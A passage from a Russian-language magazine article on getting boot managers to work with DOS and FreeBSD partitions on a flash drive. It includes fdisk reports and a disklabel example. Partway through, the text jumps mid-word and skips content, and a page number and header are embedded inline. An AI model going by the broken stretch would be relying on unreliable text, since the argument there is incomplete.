вым был проверен BootEasy, являющийся стандартным ме-
неджером загрузок для FreeBSD – дубовым, страшненьким
и абсолютно надежным. Разумеется, он заработал. После
установки BootEasy первым делом был создан образ об-
ласти загрузчика (первые 63 сектора Flash) для восстанов-
ления работоспособности системы во время эксперимен-
тов с загрузчиками.
Образ с загрузчиком BootEasy и двумя разделами (DOS
и FreeBSD) можно скачать по ссылке [10]. Отчет fdisk по это-
му образу можно скачать по ссылке [11].
Образ с загрузчиком xFDisk (внешний вид которого при-
веден на рис. 1) и двумя разделами (DOS и FreeBSD) мож-
но скачать по ссылке [12]. Отчет fdisk по этому образу мож-
но скачать по ссылке [13].
SyMon, проверенный первым, не увидел ни одного раз-
дела, программа настройки в версии 2.х отказалась за-
пуститься, в версии 3.х захотела только создать новый
раздел.
Ranish, XOSL и MATTSoft не смогли загрузиться – про-
цесс загрузки зависал сразу после появления идентифи-
кационной надписи менеджера загрузок. Особенно обид-
но было за Ranish – очень симпатичный менеджер разде-
лов. Потом был обнаружен zBoot, который наконец-то смог
загрузиться, а также ExtIPL и xFDisk. После установки ме-
неджера загрузок (в тот момент им был zBoot) с помощью
менеджера разделов Ranish Partition Manager был создан
раздел для FreeBSD.
Почему для создания раздела не использовалась стан-
дартная для FreeBSD программа /stand/sysinstall? Возник-
ло подозрение, что раздел для FreeBSD, создаваемый че-
рез sysinstall, тоже «немножко не такой», каким хотел бы
его видеть менеджер загрузок. Ниже для сравнения при-
водятся несколько укороченные отчеты fdisk по разделам,
созданным с помощью /stand/sysinstall и с помощью Ranish
Partition manager.
Раздел, созданный /stand/sysinstall:
The data for partition 1 is:
sysid 4 (0x04),(Primary DOS with 16 bit FAT (< 32MB))
start 63, size 48132 (23 Meg), flag 80 (active)
beg: cyl 0/ head 1/ sector 32;
end: cyl 23/ head 34/ sector 3
The data for partition 2 is:
sysid 165 (0xa5),(FreeBSD/NetBSD/386BSD)
start 48195, size 455613 (222 Meg), flag 0
beg: cyl 23/ head 34/ sector 4;
end: cyl 245/ head 63/ sector 32
35
 администрирование
Раздел, созданный Ranish Partiiton Manager:
The data for partition 1 is:
sysid 4 (0x04),(Primary DOS with 16 bit FAT (< 32MB))
start 63, size 48132 (23 Meg), flag 80 (active)
beg: cyl 0/ head 1/ sector 1;
end: cyl 2/ head 254/ sector 63
The data for partition 2 is:
sysid 165 (0xa5),(FreeBSD/NetBSD/386BSD)
start 48195, size 455612 (222 Meg), flag 0
beg: cyl 3/ head 0/ sector 1;
end: cyl 31/ head 91/ sector 59
Как совершенно очевидно, значения цилиндр-головка-
сектор отличаются, хотя размер разделов одинаковый. Бо-
лее того, эти цифры отличаются и от тех, что приведены
в начале статьи в плане разделов! Они изменяются, когда
команда disklabel записывает загрузчик FreeBSD. На са-
мом деле, конечно же, все эти цифры условные. На Flash
нет никаких цилиндров, головок и тому подобных вещей.
Вся эта терминология идет от жестких дисков и оставлена
для совместимости. Поэтому неудивительно, что все рабо-
дем – диск и так не очень большой. Для создания разделов
используем команду disklabel следующим образом:
# disklabel -w /dev/da0s2
Здесь /dev/da0s2 – имя слайса, на который будет установ-
лена FreeBSD. Слайс (в терминологии DOS «раздел») /dev/
da0s1 занят под DOS.
Команда disklabel создала необходимые разделы.
Но монтировать еще пока нечего, disklabel – это «fdisk
для разделов FreeBSD». Это часто вызывает путаницу –
как это, разделы внутри разделов? Несмотря на кажу-
щуюся сложность, это очень удобно. Дело в том, что раз-
мер таблицы разделов (терминология DOS) не позволяет
иметь более 4 разделов на одном диске. Ограничение это
было введено еще во времена 20Мб жестких дисков и тог-
да казалось вполне разумным. Со временем оно перерос-
ло в стандарт, и, хотя уже давным-давно стало неудоб-
ным, от него не от